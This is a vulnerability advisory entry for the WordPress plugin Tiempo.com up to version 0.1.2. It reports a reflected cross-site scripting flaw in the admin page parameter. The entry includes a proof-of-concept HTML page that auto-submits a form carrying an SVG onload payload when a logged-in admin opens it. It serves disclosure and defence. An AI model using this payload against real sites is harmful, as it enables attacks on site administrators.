Lucene search

K
wpexploitWpvulndbWPEX-ID:DBA60216-2753-40B7-8F2B-6CAEBA684B2E
HistoryApr 25, 2023 - 12:00 a.m.

Tiempo.com <= 0.1.2 - Reflected XSS

2023-04-2500:00:00
wpvulndb
115
tiempo.com
reflected xss
admin page
html injection
security exploit

EPSS

0.001

Percentile

46.9%

The plugin does not sanitise and escape the page parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Make a logged in admin open a page with the code below

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php" method="POST">
      <input type="hidden" name="page" value='"><svg/onload=alert(/XSS/)>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

EPSS

0.001

Percentile

46.9%

Related for WPEX-ID:DBA60216-2753-40B7-8F2B-6CAEBA684B2E